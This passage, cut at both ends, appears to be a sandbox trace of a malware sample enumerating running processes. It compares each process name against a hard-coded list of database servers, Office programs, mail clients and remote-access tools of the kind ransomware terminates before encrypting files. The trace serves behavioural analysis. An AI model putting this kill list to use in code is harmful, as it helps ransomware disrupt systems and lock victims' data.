affair.exe")) returned 1 [0112.771] lstrcmpiW 
(lpString1="vi affair.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.771] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x20c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="constitutedefeattgp.exe")) returned 1 [0112.772] lstrcmpiW (lpString1="constitutedefeattgp.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, 
dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.772] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="cooperation.exe")) returned 1 [0112.773] lstrcmpiW (lpString1="cooperation.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, 
ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.773] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fox camp azerbaijan.exe")) returned 1 [0112.774] lstrcmpiW (lpString1="fox camp azerbaijan.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, 
Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.774] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="territorystackpics.exe")) returned 1 [0112.775] lstrcmpiW (lpString1="territorystackpics.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.775] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="feof.exe")) returned 1 [0112.776] lstrcmpiW (lpString1="feof.exe", 
lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.776] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="capacity.exe")) returned 1 [0112.777] lstrcmpiW (lpString1="capacity.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, 
infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.777] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="newmanspringfield.exe")) returned 1 [0112.779] lstrcmpiW (lpString1="newmanspringfield.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, 
Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.779] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bare.exe")) returned 1 [0112.780] lstrcmpiW (lpString1="bare.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.780] 
Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="exhibitions.exe")) returned 1 [0112.781] lstrcmpiW (lpString1="exhibitions.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.781] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="rostermathematicalhu.exe")) returned 1 [0112.782] lstrcmpiW (lpString1="rostermathematicalhu.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, 
sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.782] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bp-goal-conclusion.exe")) returned 1 [0112.783] lstrcmpiW (lpString1="bp-goal-conclusion.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, 
outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.783] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0112.784] lstrcmpiW (lpString1="3dftp.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, 
sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.784] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0112.785] lstrcmpiW (lpString1="absolutetelnet.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.785] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: 
lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0112.786] lstrcmpiW (lpString1="alftp.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.786] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0112.787] lstrcmpiW (lpString1="barca.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, 